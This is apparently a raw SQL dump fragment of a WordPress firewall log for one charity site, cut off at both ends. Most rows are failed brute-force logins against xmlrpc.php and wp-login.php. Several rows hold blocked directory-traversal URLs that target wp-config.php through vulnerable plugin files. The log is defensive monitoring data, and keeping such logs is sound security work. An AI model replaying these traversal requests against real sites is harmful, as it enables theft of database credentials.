User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(5671,0.000000,1629138465.732842,'\0\0\0\0\0\0\0\0\0\0��b�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailValidUsername',NULL,NULL),(5672,0.000000,1629138476.911665,'\0\0\0\0\0\0\0\0\0\0��b�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailValidUsername',NULL,NULL),(5673,0.000000,1629138482.927800,'\0\0\0\0\0\0\0\0\0\0��b�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailValidUsername',NULL,NULL),(5674,1629144417.054853,1629144416.778400,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://equalitywalk.org.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(5675,1629144416.473384,1629144416.181300,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://equalitywalk.org.uk/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thamF4X3BhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlLWVkaXRvci9lZGl0b3IvZXh0ZW5zaW9ucy9wYWdlYnVpbGRlci9pbmNsdWRlcy9hamF4X3Nob3J0Y29kZV9wYXR0ZXJuLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(5676,0.000000,1629154693.428525,'\0\0\0\0\0\0\0\0\0\0��Y��~',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(5677,0.000000,1629154701.109428,'\0\0\0\0\0\0\0\0\0\0��Y��~',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(5678,0.000000,1629154706.608513,'\0\0\0\0\0\0\0\0\0\0��Y��~',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(5679,0.000000,1629182517.463851,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5680,0.000000,1629184537.479069,'\0\0\0\0\0\0\0\0\0\0���>�',0,200,0,0,0,'https://www.equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(5681,1629208910.808555,1629208910.352400,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(5682,1629216056.945580,1629216056.368000,'\0\0\0\0\0\0\0\0\0\0��fB�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(5683,0.000000,1629221283.216961,'\0\0\0\0\0\0\0\0\0\0��k���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5684,0.000000,1629221503.586480,'\0\0\0\0\0\0\0\0\0\0��3Dp^',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5685,0.000000,1629221698.473091,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5686,0.000000,1629221899.134259,'\0\0\0\0\0\0\0\0\0\0��H�*-',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5687,0.000000,1629222110.086529,'\0\0\0\0\0\0\0\0\0\0��*��U',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5688,0.000000,1629222335.502007,'\0\0\0\0\0\0\0\0\0\0��[',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5689,0.000000,1629222514.897937,'\0\0\0\0\0\0\0\0\0\0��+�p',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5690,0.000000,1629222711.221202,'\0\0\0\0\0\0\0\0\0\0��ϔ}�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5691,0.000000,1629222913.673697,'\0\0\0\0\0\0\0\0\0\0��ν��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5692,0.000000,1629222952.554289,'\0\0\0\0\0\0\0\0\0\0��>�ra',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailValidUsername',NULL,NULL),(5693,0.000000,1629222953.325649,'\0\0\0\0\0\0\0\0\0\0��>�ra',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailValidUsername',NULL,NULL),(5694,0.000000,1629222953.721298,'\0\0\0\0\0\0\0\0\0\0��>�ra',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailValidUsername',NULL,NULL),(5695,0.000000,1629223113.683849,'\0\0\0\0\0\0\0\0\0\0���b',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5696,0.000000,1629223315.736841,'\0\0\0\0\0\0\0\0\0\0����z�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5697,0.000000,1629223523.042116,'\0\0\0\0\0\0\0\0\0\0��n��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5698,0.000000,1629223739.439547,'\0\0\0\0\0\0\0\0\0\0��Y�ji',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5699,0.000000,1629223928.804347,'\0\0\0\0\0\0\0\0\0\0����~�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5700,0.000000,1629224146.548893,'\0\0\0\0\0\0\0\0\0\0��/r�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5701,0.000000,1629224344.082243,'\0\0\0\0\0\0\0\0\0\0��*��U',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5702,0.000000,1629224541.020660,'\0\0\0\0\0\0\0\0\0\0��3�\"o',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5703,0.000000,1629224744.594585,'\0\0\0\0\0\0\0\0\0\0���\0g3',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5704,0.000000,1629225155.697026,'\0\0\0\0\0\0\0\0\0\0����F',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5705,0.000000,1629225356.169832,'\0\0\0\0\0\0\0\0\0\0���@u_',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5706,0.000000,1629225559.924158,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5707,0.000000,1629225782.792820,'\0\0\0\0\0\0\0\0\0\0���[L=',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5708,0.000000,1629225967.148322,'\0\0\0\0\0\0\0\0\0\0����6p',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5709,0.000000,1629226172.492673,'\0\0\0\0\0\0\0\0\0\0��h%��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5710,0.000000,1629226390.752417,'\0\0\0\0\0\0\0\0\0\0��M\\J�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5711,0.000000,1629226584.796316,'\0\0\0\0\0\0\0\0\0\0��B�\nj',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5712,0.000000,1629226791.815868,'\0\0\0\0\0\0\0\0\0\0���@v7',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5713,0.000000,1629227055.268528,'\0\0\0\0\0\0\0\0\0\0�����f',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5714,0.000000,1629227322.027436,'\0\0\0\0\0\0\0\0\0\0���]c8',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5715,0.000000,1629227596.653380,'\0\0\0\0\0\0\0\0\0\0��@oxI',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5716,0.000000,1629227880.644937,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5717,0.000000,1629228181.807908,'\0\0\0\0\0\0\0\0\0\0��g���',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5718,0.000000,1629228468.432414,'\0\0\0\0\0\0\0\0\0\0��|�\n',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5719,0.000000,1629228756.874454,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5720,0.000000,1629229034.419393,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5721,0.000000,1629229339.159596,'\0\0\0\0\0\0\0\0\0\0��Ȗ��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5722,0.000000,1629229622.514807,'\0\0\0\0\0\0\0\0\0\0��k��2',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5723,0.000000,1629229886.037703,'\0\0\0\0\0\0\0\0\0\0��g��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5724,0.000000,1629230222.559778,'\0\0\0\0\0\0\0\0\0\0��4��~',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5725,0.000000,1629230495.750151,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5726,0.000000,1629230760.903662,'\0\0\0\0\0\0\0\0\0\0��%�[',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5727,0.000000,1629231022.865839,'\0\0\0\0\0\0\0\0\0\0���@r',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5728,0.000000,1629231362.390766,'\0\0\0\0\0\0\0\0\0\0��.e�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5729,0.000000,1629231644.168088,'\0\0\0\0\0\0\0\0\0\0��3�e2',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5730,0.000000,1629231934.434020,'\0\0\0\0\0\0\0\0\0\0��/���',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5731,0.000000,1629232250.576068,'\0\0\0\0\0\0\0\0\0\0��T�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5732,0.000000,1629232552.502392,'\0\0\0\0\0\0\0\0\0\0���1T&',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5733,0.000000,1629232819.450890,'\0\0\0\0\0\0\0\0\0\0���p�-',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5734,0.000000,1629233149.075384,'\0\0\0\0\0\0\0\0\0\0����jQ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5735,0.000000,1629233429.609039,'\0\0\0\0\0\0\0\0\0\0��h',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5736,0.000000,1629233678.596556,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5737,0.000000,1629234028.668076,'\0\0\0\0\0\0\0\0\0\0��ϔK',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5738,0.000000,1629234295.203692,'\0\0\0\0\0\0\0\0\0\0���YcD',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5739,0.000000,1629234596.443926,'\0\0\0\0\0\0\0\0\0\0���A�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5740,0.000000,1629234892.978556,'\0\0\0\0\0\0\0\0\0\0���@rP',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5741,0.000000,1629235239.817107,'\0\0\0\0\0\0\0\0\0\0��{��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5742,0.000000,1629235529.129292,'\0\0\0\0\0\0\0\0\0\0��g��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5743,0.000000,1629235869.618805,'\0\0\0\0\0\0\0\0\0\0����X�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5744,0.000000,1629236185.061957,'\0\0\0\0\0\0\0\0\0\0��\\>cc',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5745,0.000000,1629236517.149546,'\0\0\0\0\0\0\0\0\0\0�����[',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5746,0.000000,1629236831.191785,'\0\0\0\0\0\0\0\0\0\0���_nq',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5747,0.000000,1629237123.132268,'\0\0\0\0\0\0\0\0\0\0����<�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5748,0.000000,1629237482.856878,'\0\0\0\0\0\0\0\0\0\0���t�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5749,0.000000,1629237766.867902,'\0\0\0\0\0\0\0\0\0\0���;�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5750,0.000000,1629238024.526621,'\0\0\0\0\0\0\0\0\0\0��w��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5751,0.000000,1629238362.939288,'\0\0\0\0\0\0\0\0\0\0���[J�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5752,0.000000,1629238698.959111,'\0\0\0\0\0\0\0\0\0\0��#�^_',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5753,0.000000,1629239012.770395,'\0\0\0\0\0\0\0\0\0\0���VBe',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5754,0.000000,1629239303.421056,'\0\0\0\0\0\0\0\0\0\0��t�$',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5755,0.000000,1629239640.912225,'\0\0\0\0\0\0\0\0\0\0��#��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5756,0.000000,1629239974.642892,'\0\0\0\0\0\0\0\0\0\0���Z�_',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5757,0.000000,1629240264.072055,'\0\0\0\0\0\0\0\0\0\0��g�y�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5758,0.000000,1629240587.217286,'\0\0\0\0\0\0\0\0\0\0���\n�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5759,0.000000,1629240904.806040,'\0\0\0\0\0\0\0\0\0\0���8-2',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5760,0.000000,1629241212.100300,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 